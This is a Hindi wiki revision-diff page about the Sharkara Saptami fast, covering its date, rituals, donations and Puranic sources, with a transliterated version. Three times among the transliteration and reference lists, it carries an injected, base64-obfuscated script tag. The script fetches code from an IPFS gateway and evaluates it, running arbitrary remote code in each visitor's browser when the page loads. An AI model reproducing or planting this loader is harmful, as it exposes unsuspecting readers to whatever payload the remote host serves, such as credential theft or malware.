Difference between revisions of "शर्करा सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - ")</ref" to "</ref")
 
(9 intermediate revisions by 4 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की [[सप्तमी]] पर शर्करासप्तमी व्रत किया जाता है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की [[सप्तमी]] पर शर्करासप्तमी व्रत किया जाता है।
 
*प्रात:काल [[तिल]] युक्त [[जल]] से स्नान करना चाहिए।
 
*प्रात:काल [[तिल]] युक्त [[जल]] से स्नान करना चाहिए।
Line 5: Line 5:
 
*एक घट का स्थापन, जिसमें एक [[हिरण्य]] खण्ड डाल दिया जाता है, जिसके ढक्कन पर [[गुड़]] रखा जाता है।
 
*एक घट का स्थापन, जिसमें एक [[हिरण्य]] खण्ड डाल दिया जाता है, जिसके ढक्कन पर [[गुड़]] रखा जाता है।
 
*पौराणिक मंत्र से पूजन करना चाहिए।
 
*पौराणिक मंत्र से पूजन करना चाहिए।
*पंचगव्य ग्रहण; घट के पास पृथ्वी पर लेटना और धीरे-धीरे सौर मंत्र <ref>([[ॠगवेद]] 1|50)</ref> का पाठ करना चाहिए।
+
*पंचगव्य ग्रहण; घट के पास पृथ्वी पर लेटना और धीरे-धीरे सौर मंत्र <ref>[[ॠग्वेद]] 1|50</ref> का पाठ करना चाहिए।
 
*[[अष्टमी]] को सभी उपयुक्त [[पदार्थ|पदार्थों]] का दान तथा [[शर्करा]], [[घी]], [[पायस]] से ब्रह्मभोज और स्वयं बिना [[नमक]] एवं [[तेल]] का भोजन करना चाहिए।
 
*[[अष्टमी]] को सभी उपयुक्त [[पदार्थ|पदार्थों]] का दान तथा [[शर्करा]], [[घी]], [[पायस]] से ब्रह्मभोज और स्वयं बिना [[नमक]] एवं [[तेल]] का भोजन करना चाहिए।
 
*एक वर्ष तक प्रत्येक मास में यही विधि का पालन करना चाहिए।
 
*एक वर्ष तक प्रत्येक मास में यही विधि का पालन करना चाहिए।
 
*वर्ष के अन्त में उपकरण युक्त पलंग, शर्करा, [[सोना]], [[गाय]] एवं [[गृह]] (यदि सम्भव हो सके) तथा 1 से 1000 तक के निष्कों से बने एक स्वर्णिम कमल का दान होना चाहिए।
 
*वर्ष के अन्त में उपकरण युक्त पलंग, शर्करा, [[सोना]], [[गाय]] एवं [[गृह]] (यदि सम्भव हो सके) तथा 1 से 1000 तक के निष्कों से बने एक स्वर्णिम कमल का दान होना चाहिए।
*जब [[सूर्य देव|सूर्य]] अमृत पीने लगे तो कुछ बूँदें [[चावल]], [[मुद्ग]] एवं [[ईख]] पर गिर पड़ीं।
+
*जब [[सूर्य देव|सूर्य]] अमृत पीने लगे तो कुछ बूँदें [[चावल]], मुद्ग एवं [[ईख]] पर गिर पड़ीं।
 
*शर्करासप्तमी तिथिव्रत; देवता सूर्य है।
 
*शर्करासप्तमी तिथिव्रत; देवता सूर्य है।
*इस व्रत से चिन्ता दूर होती है, पुत्रोत्पत्ति, दीर्घायु एवं स्वास्थ्य की प्राप्ति होती है। <ref>[[मत्स्य पुराण]] (77|1-17); कृत्यकल्पतरु (व्रत खण्ड 214-217); हेमाद्रि (व्रत खण्ड 1, 642-643, [[पद्म पुराण]] 5|21|263-279 से उद्धरण; कृत्यरत्नाकर (157-159, मत्स्यपुराण से उद्धरण)</ref>
+
*इस व्रत से चिन्ता दूर होती है, पुत्रोत्पत्ति, दीर्घायु एवं स्वास्थ्य की प्राप्ति होती है। <ref>[[मत्स्य पुराण]] (77|1-17); कृत्यकल्पतरु (व्रत खण्ड 214-217); हेमाद्रि (व्रत खण्ड 1, 642-643, [[पद्म पुराण]] 5|21|263-279 से उद्धरण; कृत्यरत्नाकर (157-159, मत्स्यपुराण से उद्धरण</ref>
*भविष्योत्तरपुराण <ref>(भविष्योत्तरपुराण 49|1-18)</ref> में भी मत्स्यपुराण के [[श्लोक]] पाये जाते हैं।  
+
*भविष्योत्तरपुराण <ref>भविष्योत्तरपुराण 49|1-18</ref> में भी मत्स्यपुराण के [[श्लोक]] पाये जाते हैं।  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:40, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki saptami par sharkarasaptami vrat kiya jata hai.
  • prat:kal til yukt jal se snan karana chahie.
  • ek vedi par kuankum se kamal evan bijakosh banana aur us par 'nam: savitre' ke sath dhoop evan pushpoan ka arpan karana chahie.
  • ek ghat ka sthapan, jisamean ek hirany khand dal diya jata hai, jisake dhakkan par gu d rakha jata hai.
  • pauranik mantr se poojan karana chahie.
  • panchagavy grahan; ghat ke pas prithvi par letana aur dhire-dhire saur mantr [1] ka path karana chahie.
  • ashtami ko sabhi upayukt padarthoan ka dan tatha sharkara, ghi, payas se brahmabhoj aur svayan bina namak evan tel ka bhojan karana chahie.
  • ek varsh tak pratyek mas mean yahi vidhi ka palan karana chahie.
  • varsh ke ant mean upakaran yukt palang, sharkara, sona, gay evan grih (yadi sambhav ho sake) tatha 1 se 1000 tak ke nishkoan se bane ek svarnim kamal ka dan hona chahie.
  • jab soory amrit pine lage to kuchh booandean chaval, mudg evan eekh par gir p dian.
  • sharkarasaptami tithivrat; devata soory hai.
  • is vrat se chinta door hoti hai, putrotpatti, dirghayu evan svasthy ki prapti hoti hai. [2]
  • bhavishyottarapuran [3] mean bhi matsyapuran ke shlok paye jate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. rrigved 1|50
  2. matsy puran (77|1-17); krityakalpataru (vrat khand 214-217); hemadri (vrat khand 1, 642-643, padm puran 5|21|263-279 se uddharan; krityaratnakar (157-159, matsyapuran se uddharan
  3. bhavishyottarapuran 49|1-18

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>